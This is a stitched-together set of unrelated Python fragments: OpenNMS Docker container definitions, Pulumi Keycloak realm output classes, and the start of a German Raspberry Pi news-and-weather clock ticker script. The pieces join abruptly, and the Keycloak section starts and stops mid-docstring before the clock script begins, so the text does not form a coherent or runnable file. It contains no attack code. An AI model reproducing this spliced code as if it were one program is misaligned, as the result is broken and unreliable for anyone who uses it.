self._container_config.add_environment("INIT_SSL_UNIT",
self._container_parameters["ssl_unit"])
self._container_config.add_environment("INIT_SSL_COUNTRY",
self._container_parameters["ssl_country"])
self._container_config.add_environment("INIT_SSL_STATE",
self._container_parameters["ssl_state"])
self._container_config.add_environment("INIT_SSL_LOCATION",
self._container_parameters["ssl_location"])
self._container_config.add_environment("INIT_SSL_VALIDDAYS",
self._container_parameters["ssl_valid_time_days"])
self._container_config.add_environment("INIT_SSL_KEYLENGTH",
self._container_parameters["ssl_keylength"])
self._container_config.add_environment("INIT_SSL_DIGEST",
self._container_parameters["ssl_digest"])
self._container_config.add_environment("CONF_SUPPORTTEXT",
self._container_parameters["support_text"])
for i, location in enumerate(self.__proxy_locations, start=10):
location_varname = "CONF_LOCATION_" + str(i)
location_value = location["name"] + ";" + location["location"] + ";" + location["url"]
self._container_config.add_environment(location_varname, location_value)
def set_proxy_locations(self, proxy_locations):
"""Method for adding proxy locations
This method must be executed before the setup_container() method
"""
self.__proxy_locations.extend(proxy_locations)
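# --- Wiring sketch: proxy locations are collected from the other containers and
# handed to Nginx before its setup_container() call (illustrative ordering; the
# container variables are assumptions) ---
#
# nginx = Nginx("nginx", output_basedir, app_config)
# for container in (opennms, grafana, alarmforwarder):
#     nginx.set_proxy_locations(container.get_proxy_locations())
# nginx.setup_container()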
class Grafana(Container):
"""Class for defining a container for Grafana
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "<PASSWORD>"),
("opennms_url", "http://opennms:8980/opennms"),
("opennms_username", "admin"),
("opennms_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "Grafana",
"location": "/grafana/",
"url": "http://grafana:3000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-grafana:3.1.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/grafana")
self._container_config.add_buildarg("url_sw_grafana", "https://opennmsdeploy.nethinks.com/software/grafana/grafana-3.1.1-1470047149.linux-x64.tar.gz")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("grafana")
self._container_config.add_volume("grafana:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/grafana:/data/init")
class AlarmForwarder(Container):
"""Class for defining a container for Alarmforwarder
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "<PASSWORD>"),
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "<PASSWORD>"),
("db_server", "postgres"),
("db_name", "alarmforwarder"),
("db_user", "postgres"),
("db_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
self._container_parameters["db_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "AlarmForwarder",
"location": "/alarmforwarder/",
"url": "http://alarmforwarder:5000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-alarmforwarder:1.0.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/alarmforwarder")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("DB_SERVER",
self._container_parameters["db_server"])
self._container_config.add_environment("DB_NAME",
self._container_parameters["db_name"])
self._container_config.add_environment("DB_USER",
self._container_parameters["db_user"])
self._container_config.add_environment("DB_PASSWORD",
self._container_parameters["db_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("alarmforwarder")
self._container_config.add_volume("alarmforwarder:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/alarmforwarder:/data/init")
self._container_config.add_dependency("postgres")
class YourDashboard(Container):
"""Class for defining a container for yourDashboard
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "yourDashboard",
"location": "/yourdashboard",
"url": "http://yourdashboard"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-yourdashboard:0.3-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/yourdashboard")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_OPENNMS_SERVER", "http://opennms:8980/opennms")
self._container_config.add_environment("INIT_OPENNMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("INIT_OPENNMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("yourdashboard")
self._container_config.add_volume("yourdashboard:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/yourdashboard:/data/init")
class Pris(Container):
"""Class for defining a container for PRIS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-pris:1.1.5-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/pris")
self._container_config.add_buildarg("url_sw_pris", "https://opennmsdeploy.nethinks.com/software/pris/opennms-pris-dist-1.1.5-release-archive.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_namedvolumes.append("pris")
self._container_config.add_volume("pris:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/pris:/data/init")
class IPv6Helper(Container):
"""Class for defining a container for IPv6Helper
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ip6net", "fd00:1::/48"),
("bridge_interface", "onmsenv0")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ip6net"] = self._app_config.get_value("network", "ipv6_internal_net", "")
self._container_parameters["bridge_interface"] = self._app_config.get_value("network", "bridge_interface_name", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-ipv6helper:1.0.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/ipv6helper")
self._container_config.set_restart_policy("always")
self._container_config.set_privileged(True)
self._container_config.set_network_mode("host")
self._container_config.add_environment("CONF_IP6NET",
self._container_parameters["ip6net"])
self._container_config.add_environment("CONF_BRIDGE_INTERFACE",
self._container_parameters["bridge_interface"])
self._container_config.add_volume("/lib/modules:/lib/modules:ro")
class Management(Container):
"""Class for defining a container for management access
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssh_password", "<PASSWORD>"),
("backup_enabled", "False"),
("backup_url", "smb://username:password@1.2.3.4/backup/test"),
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssh_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["backup_enabled"] = self._app_config.get_value("backup", "enabled", "False")
self._container_parameters["backup_url"] = self._app_config.get_value("backup", "url", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-management:1.1.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/management")
self._container_config.add_buildarg("url_sw_docker", "https://opennmsdeploy.nethinks.com/software/docker/docker-17.03.1-ce.tgz")
self._container_config.set_restart_policy("always")
self._container_config.add_port("2222:22")
self._container_config.add_environment("CONF_SSH_PASSWORD",
self._container_parameters["ssh_password"])
self._container_namedvolumes.append("export")
self._container_namedvolumes.append("management")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("management:/data/container")
self._container_config.add_volume("opennms:/data/all-containers/opennms")
self._container_config.add_volume("rrd:/data/all-containers/rrd")
self._container_config.add_volume("postgres:/data/all-containers/postgres")
self._container_config.add_volume("nginx:/data/all-containers/nginx")
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_volume("cassandra:/data/all-containers/cassandra")
if self._app_config.get_value_boolean("container", "alarmforwarder"):
self._container_config.add_volume("alarmforwarder:/data/all-containers/alarmforwarder")
if self._app_config.get_value_boolean("container", "grafana"):
self._container_config.add_volume("grafana:/data/all-containers/grafana")
if self._app_config.get_value_boolean("container", "yourdashboard"):
self._container_config.add_volume("yourdashboard:/data/all-containers/yourdashboard")
if self._app_config.get_value_boolean("container", "pris"):
self._container_config.add_volume("pris:/data/all-containers/pris")
self._container_config.add_volume("./init/management:/data/init")
self._container_config.add_volume("/var/run/docker.sock:/var/run/docker.sock")
# create backup config, if required (backup_enabled comes from the config file as a string)
if self._container_parameters["backup_enabled"] != "False":
self._container_config.add_environment("CONF_BACKUP_ENABLED", "TRUE")
self._container_config.add_environment("CONF_BACKUP_URL",
self._container_parameters["backup_url"])
| |
default Realm behavior.
"""
return pulumi.get(self, "realm_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecInstanceSelector(dict):
"""
Selector for looking up Keycloak Custom Resources.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.KeycloakRealmSpecInstanceSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
Selector for looking up Keycloak Custom Resources.
:param Sequence['KeycloakRealmSpecInstanceSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.KeycloakRealmSpecInstanceSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecInstanceSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
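# --- Field-shape sketch (output types like these are normally produced by the
# provider rather than built by hand; shown only to illustrate the selector
# semantics documented above, with illustrative labels) ---
#
# selector = KeycloakRealmSpecInstanceSelector(
#     match_labels={"app": "sso"},
#     match_expressions=[KeycloakRealmSpecInstanceSelectorMatchExpressions(
#         key="environment", operator="In", values=["prod", "staging"])])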
@pulumi.output_type
class KeycloakRealmSpecRealm(dict):
"""
Keycloak Realm REST object.
"""
def __init__(__self__, *,
realm: str,
admin_events_details_enabled: Optional[bool] = None,
admin_events_enabled: Optional[bool] = None,
clients: Optional[Sequence['outputs.KeycloakRealmSpecRealmClients']] = None,
display_name: Optional[str] = None,
enabled: Optional[bool] = None,
events_enabled: Optional[bool] = None,
events_listeners: Optional[Sequence[str]] = None,
id: Optional[str] = None,
identity_providers: Optional[Sequence['outputs.KeycloakRealmSpecRealmIdentityProviders']] = None,
users: Optional[Sequence['outputs.KeycloakRealmSpecRealmUsers']] = None):
"""
Keycloak Realm REST object.
:param str realm: Realm name.
:param bool admin_events_details_enabled: Enable admin events details TODO: change to values and use kubebuilder default annotation once supported
:param bool admin_events_enabled: Enable events recording TODO: change to values and use kubebuilder default annotation once supported
:param Sequence['KeycloakRealmSpecRealmClientsArgs'] clients: A set of Keycloak Clients.
:param str display_name: Realm display name.
:param bool enabled: Realm enabled flag.
:param bool events_enabled: Enable events recording TODO: change to values and use kubebuilder default annotation once supported
:param Sequence[str] events_listeners: A set of Event Listeners.
:param Sequence['KeycloakRealmSpecRealmIdentityProvidersArgs'] identity_providers: A set of Identity Providers.
:param Sequence['KeycloakRealmSpecRealmUsersArgs'] users: A set of Keycloak Users.
"""
pulumi.set(__self__, "realm", realm)
if admin_events_details_enabled is not None:
pulumi.set(__self__, "admin_events_details_enabled", admin_events_details_enabled)
if admin_events_enabled is not None:
pulumi.set(__self__, "admin_events_enabled", admin_events_enabled)
if clients is not None:
pulumi.set(__self__, "clients", clients)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if events_enabled is not None:
pulumi.set(__self__, "events_enabled", events_enabled)
if events_listeners is not None:
pulumi.set(__self__, "events_listeners", events_listeners)
if id is not None:
pulumi.set(__self__, "id", id)
if identity_providers is not None:
pulumi.set(__self__, "identity_providers", identity_providers)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter
def realm(self) -> str:
"""
Realm name.
"""
return pulumi.get(self, "realm")
@property
@pulumi.getter(name="adminEventsDetailsEnabled")
def admin_events_details_enabled(self) -> Optional[bool]:
"""
Enable admin events details TODO: change to values and use kubebuilder default annotation once supported
"""
return pulumi.get(self, "admin_events_details_enabled")
@property
@pulumi.getter(name="adminEventsEnabled")
def admin_events_enabled(self) -> Optional[bool]:
"""
Enable events recording TODO: change to values and use kubebuilder default annotation once supported
"""
return pulumi.get(self, "admin_events_enabled")
@property
@pulumi.getter
def clients(self) -> Optional[Sequence['outputs.KeycloakRealmSpecRealmClients']]:
"""
A set of Keycloak Clients.
"""
return pulumi.get(self, "clients")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[str]:
"""
Realm display name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
Realm enabled flag.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="eventsEnabled")
def events_enabled(self) -> Optional[bool]:
"""
Enable events recording TODO: change to values and use kubebuilder default annotation once supported
"""
return pulumi.get(self, "events_enabled")
@property
@pulumi.getter(name="eventsListeners")
def events_listeners(self) -> Optional[Sequence[str]]:
"""
A set of Event Listeners.
"""
return pulumi.get(self, "events_listeners")
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="identityProviders")
def identity_providers(self) -> Optional[Sequence['outputs.KeycloakRealmSpecRealmIdentityProviders']]:
"""
A set of Identity Providers.
"""
return pulumi.get(self, "identity_providers")
@property
@pulumi.getter
def users(self) -> Optional[Sequence['outputs.KeycloakRealmSpecRealmUsers']]:
"""
A set of Keycloak Users.
"""
return pulumi.get(self, "users")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecRealmClients(dict):
def __init__(__self__, *,
client_id: str,
access: Optional[Mapping[str, bool]] = None,
admin_url: Optional[str] = None,
attributes: Optional[Mapping[str, str]] = None,
base_url: Optional[str] = None,
bearer_only: Optional[bool] = None,
client_authenticator_type: Optional[str] = None,
consent_required: Optional[bool] = None,
default_roles: Optional[Sequence[str]] = None,
description: Optional[str] = None,
direct_access_grants_enabled: Optional[bool] = None,
enabled: Optional[bool] = None,
frontchannel_logout: Optional[bool] = None,
full_scope_allowed: Optional[bool] = None,
id: Optional[str] = None,
implicit_flow_enabled: Optional[bool] = None,
name: Optional[str] = None,
node_re_registration_timeout: Optional[int] = None,
not_before: Optional[int] = None,
protocol: Optional[str] = None,
protocol_mappers: Optional[Sequence['outputs.KeycloakRealmSpecRealmClientsProtocolMappers']] = None,
public_client: Optional[bool] = None,
redirect_uris: Optional[Sequence[str]] = None,
root_url: Optional[str] = None,
secret: Optional[str] = None,
service_accounts_enabled: Optional[bool] = None,
standard_flow_enabled: Optional[bool] = None,
surrogate_auth_required: Optional[bool] = None,
use_template_config: Optional[bool] = None,
use_template_mappers: Optional[bool] = None,
use_template_scope: Optional[bool] = None,
web_origins: Optional[Sequence[str]] = None):
"""
:param str client_id: Client ID.
:param Mapping[str, bool] access: Access options.
:param str admin_url: Application Admin URL.
:param Mapping[str, str] attributes: Client Attributes.
:param str base_url: Application base URL.
:param bool bearer_only: True if a client supports only Bearer Tokens.
:param str client_authenticator_type: What Client authentication type to use.
:param bool consent_required: True if Consent Screen is required.
:param Sequence[str] default_roles: Default Client roles.
:param str description: Client description.
:param bool direct_access_grants_enabled: True if Direct Grant is enabled.
:param bool enabled: Client enabled flag.
:param bool frontchannel_logout: True if this client supports Front Channel logout.
:param bool full_scope_allowed: True if Full Scope is allowed.
:param str id: Client ID. If not specified, automatically generated.
:param bool implicit_flow_enabled: True if Implicit flow is enabled.
:param str name: Client name.
:param int node_re_registration_timeout: Node registration timeout.
:param int not_before: Not Before setting.
:param str protocol: Protocol used for this Client.
:param Sequence['KeycloakRealmSpecRealmClientsProtocolMappersArgs'] protocol_mappers: Protocol Mappers.
:param bool public_client: True if this is a public Client.
:param Sequence[str] redirect_uris: A list of valid Redirection URLs.
:param str root_url: Application root URL.
:param str secret: Client Secret. The Operator will automatically create a Secret based on this value.
:param bool service_accounts_enabled: True if Service Accounts are enabled.
:param bool standard_flow_enabled: True if Standard flow is enabled.
:param bool surrogate_auth_required: Surrogate Authentication Required option.
:param bool use_template_config: True to use a Template Config.
:param bool use_template_mappers: True to use Template Mappers.
:param bool use_template_scope: True to use Template Scope.
#!/usr/bin/env python3
# RollingClockTicker by joe703 / https://www.youtube.com/channel/UChMi8gAr52_jZXIpr9WXYQQ
# Improvements and extensions by Mario
import time
import socket
import feedparser
import requests
import RollingClock
import sys, signal
import imaplib
from fritzconnection.lib.fritzcall import FritzCall # pip3 install fritzconnection
import json, urllib.request
from re import sub
from datetime import date, datetime
import RPi.GPIO as GPIO
global OFFSET, WeatherNewsAPIKey, TelegramAPIKey, WheatherNewsCity
OFFSET = 0
def time_in_range(start, end, x):
if start <= end:
return start <= x <= end
else:
return start <= x or x <= end
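# Usage sketch (assumed example values): time_in_range also handles ranges that
# wrap past midnight, e.g. a quiet period from 23:00 to 06:00:
#
#     from datetime import time as dtime
#     time_in_range(dtime(23, 0), dtime(6, 0), dtime(1, 30))   # -> True
#     time_in_range(dtime(23, 0), dtime(6, 0), dtime(12, 0))   # -> False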
def signal_handler(signal, stackframe):
Uhr.Hide()
ClockHide= True
ClockStop= True
Uhr.close()
print("Stop der Uhr angefordert")
Uhr.join()
print("Uhr gestoppt")
sys.exit()
def ReadYoutubeSubscriberCounter():
try:
url = "https://www.googleapis.com/youtube/v3/channels?part=statistics&id=___YOUTUBE-KANAL-ID___&key=___GOOGLE-API-KEY___"
res = urllib.request.urlopen(url).read().decode('utf-8')
data = json.loads(res)
SubscriberText = data['items'][0]['statistics']['subscriberCount']
except:
SubscriberText = "???"
return "Mario's Kanal: " + SubscriberText + " Abonnenten"
def ReadNews():
try:
NewsFeed = feedparser.parse("https://www.tagesschau.de/xml/rss2_https/")
NewsText = NewsFeed.entries[0].title+": "+NewsFeed.entries[0].content[1].value
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
NewsText = NewsText.replace(char,chars[char])
except:
NewsText = "Keine Tagesschau News ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', NewsText)
def ITNews():
try:
ITFeed = feedparser.parse("https://www.heise.de/rss/heise-Rubrik-IT.rdf")
ITText = ITFeed.entries[0].title+": "+ITFeed.entries[0].description
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
ITText = ITText.replace(char,chars[char])
except:
ITText = "Keine Heise IT News ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', ITText)
def MobileNews():
try:
MobileFeed = feedparser.parse("https://www.heise.de/rss/heise-Rubrik-Mobiles.rdf")
MobileText = MobileFeed.entries[0].title+": "+MobileFeed.entries[0].description
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
MobileText = MobileText.replace(char,chars[char])
except:
MobileText = "Keine Heise Mobile News ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', MobileText)
def BoersenNews():
try:
BoersenFeed = feedparser.parse("https://www.finanztreff.de/rdf_news_category-marktberichte.rss")
BoersenText = BoersenFeed.entries[0].title
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
BoersenText = BoersenText.replace(char,chars[char])
except:
BoersenText = "Keine Boersennews ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', '', BoersenText)
def WetterNews(): # fetch data from OpenWeatherMap
try:
API_KEY = WeatherNewsAPIKey # API key for OpenWeatherMap
city = WheatherNewsCity # desired city
url = f'https://api.openweathermap.org/data/2.5/weather?q={city}&appid={API_KEY}&units=metric'
data = requests.get(url).json()
temp = int(float(data['main']['temp'])) # current temperature
humidity = data['main']['humidity'] # current humidity
wspeed = int(float(data['wind']['speed'])*3.6) # current wind speed in km/h
airpress = int(float(data['main']['pressure'])) # current air pressure
sunrise = data['sys']['sunrise'] # sunrise
sunset = data['sys']['sunset'] # sunset
sunrise = datetime.fromtimestamp(sunrise).strftime('%H:%M') # sunrise formatted (local time)
sunset = datetime.fromtimestamp(sunset).strftime('%H:%M') # sunset formatted (local time)
#sunrise = datetime.utcfromtimestamp(sunrise).strftime('%H:%M')+ " Uhr" # sunrise formatted (UTC time)
#sunset = datetime.utcfromtimestamp(sunset).strftime('%H:%M')+ " Uhr" # sunset formatted (UTC time)
for i in data['weather']:
dsky = i['description'] # current conditions (e.g. rain, fog, clouds)
wid = i['id'] # current weather ID
if dsky != "mist" and wid != "701":
break # stop after the first description if several are present
if dsky == "scattered clouds" or dsky == "clear sky":
mc = "high" # LED matrix contrast high
else:
mc = "low" # LED matrix contrast low
WetterText = f'Aktuelle Wetterdaten fuer {city}: Temperatur: {dsky} bei {temp} Grad - Luftfeuchte: {humidity} % - Luftdruck: {airpress} hPa - Wind: {wspeed} km/h - Sonnenaufgang: {sunrise} Uhr - Sonnenuntergang: {sunset} Uhr'
chars = {'broken clouds':'aufgelockert bewoelkt',
'few clouds':'leicht bewoelkt',
'clear sky':'klarer Himmel',
'light rain':'leichter Regen',
'overcast clouds':'bedeckter Himmel',
'fog':'Nebel',
'rain':'Regen',
'heavy intensity rain':'starker Regen',
'moderate rain':'leichter Regen',
'scattered clouds':'vereinzelt Wolken'} # translate the English descriptions into German (extend as needed)
for char in chars:
WetterText = WetterText.replace(char,chars[char])
except:
WetterText = "Wetterdaten deaktiviert!"
mc = "low" # LED-Matrix Kontrast niedrig
sunrise = "06:00" # Sonnenaufgang im Fehlerfall oder wenn Wetterdaten deaktiviert
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', WetterText), mc, sunrise
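# Usage sketch: WetterNews() returns a 3-tuple of the sanitised weather text,
# a contrast hint ("high"/"low") for the LED matrix, and the sunrise time:
#
#     WetterText, MatrixContrast, Sunrise = WetterNews()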
def BadWeatherNews(URL): # https://wettwarn.de/wettwarn_wetterwarnungen/warnregion_waehlen/
try:
BadWeatherNewsFeed = feedparser.parse(URL)
BadWeatherNewsText = BadWeatherNewsFeed.entries[0].title
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
BadWeatherNewsText = BadWeatherNewsText.replace(char,chars[char])
if BadWeatherNewsText == "Keine Warnungen":
BadWeatherNewsText = "DWD WETTERWARNUNG: Keine Warnungen"
if BadWeatherNewsText.startswith("DWD WETTERWARNUNG:"):
BadWeatherNewsText = BadWeatherNewsText.replace("DWD WETTERWARNUNG:", "Achtung Unwetterwarnung:")
except:
BadWeatherNewsText = "Keine Unwetterwarnungen ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', '', BadWeatherNewsText)
def FritzBoxMissedCallCount(IP,FB_Password):
try:
fc = FritzCall(address=IP, password=FB_Password)
calls = fc.get_missed_calls(update=True, num=None, days=1) # list of missed calls from today and yesterday
# calls = fc.get_missed_calls(update=True, num=None, days=None) # list of all missed calls
CallCount = 0
for call in calls:
CallCount = CallCount + 1
except:
CallCount = -1
return CallCount
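# Usage sketch (address and password are placeholders): the function returns -1
# when the FRITZ!Box is unreachable or the credentials are wrong. Note that
# len(calls) would yield the same count as the loop above:
#
#     missed = FritzBoxMissedCallCount("192.168.178.1", "secret")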
def UnreadMailCount(Servername, UserName, Password):
try:
mail = imaplib.IMAP4_SSL(Servername)
mail.login(UserName, Password)
mail.select("inbox", True) # connect to inbox.
return_code, mail_ids = mail.search(None, 'UnSeen')
count = len(mail_ids[0].split())
except:
count = -1
return count
def TelegramNews(): # fetch and display messages from the Telegram chat app
try:
botToken = TelegramAPIKey # bot token of the created Telegram bot
url = 'https://api.telegram.org/bot' + botToken + '/getUpdates' # the Bot API is served over HTTPS
update_raw = requests.get(url + "?offset=" + str(OFFSET))
update = update_raw.json()
num_updates = len(update["result"])
last_update = num_updates - 1
TelegramText = update['result'][last_update]['message']['text']
except:
TelegramText = "Telegram Nachrichten deaktiviert!"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', TelegramText) # return the sanitised Telegram text
def IsOnline():
mem1 = 0
try:
host = socket.gethostbyname("www.google.com") # Change to personal choice of site
s = socket.create_connection((host, 80), 2)
s.close()
mem2 = 1
if mem2 == mem1:
pass # Add commands to be executed on every check
else:
mem1 = mem2
#IsOnlineText = "Internet is working" # Will be executed on state change
return True
except Exception as e:
mem2 = 0
if mem2 == mem1:
pass
else:
mem1 = mem2
# IsOnlineText = "Internet is down"
return False
if __name__ == "__main__":
Wochentag =["Sonntag ", "Montag ", "Dienstag ", "Mittwoch ", "Donnerstag ", "Freitag ", "Samstag "]
# ******************************************************************************************************
# ************** Preset the variables below with the desired values ************************************
# ******************************************************************************************************
#----------------------------------------------------------------------------------------------------
# Alignment of the clock display
ClockDisplayPosition = "top" # top = top - bottom = bottom (anything other than top or bottom = bottom)
#----------------------------------------------------------------------------------------------------
# Set the scroll-in and scroll-out behaviour of the display
ClockScrollIn = "V" # V = vertical H = horizontal default is "V"
